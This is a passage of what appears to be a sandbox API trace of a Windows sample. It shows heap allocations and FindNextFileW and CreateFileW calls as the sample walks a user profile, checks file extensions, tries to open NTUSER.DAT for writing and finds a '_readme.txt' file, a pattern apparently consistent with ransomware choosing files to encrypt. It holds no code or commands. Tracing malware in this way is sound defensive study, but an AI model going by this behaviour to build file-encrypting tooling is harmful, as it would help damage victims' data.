(HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ba90 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.108] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x16c) returned 0xdd1ba90 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5ef8 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ba90 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757bca0 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e90 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.109] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda6abb60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda6abb60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0130.109] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.109] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c010 [0130.109] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0130.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.110] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0130.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.110] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0130.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.110] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0130.110] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0130.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0130.111] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f82a0 [0130.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0130.111] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0130.111] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0130.111] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.111] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.111] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0130.112] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x214) returned 0xdce0a50 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757be00 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db7f0 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db848 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5b50 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a80 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db8a0 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db8f8 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db950 [0130.112] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.112] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0130.112] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.112] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0130.113] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.113] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.113] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5dc0 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x310) returned 0xdd06f38 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e90 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757bca0 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ba90 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5ef8 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5670 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5ae8 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5c88 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49db9a8 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf59b0 [0130.113] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49dba00 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49dba58 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5948 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49dbab0 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5a18 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49dbb08 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x49dbb60 [0130.114] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.114] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc1bf5a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc1bf5a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0130.114] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.114] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0130.114] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.114] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.114] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0130.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9a0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.115] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0130.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9a0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.115] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0130.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9a0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.115] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.115] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0130.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 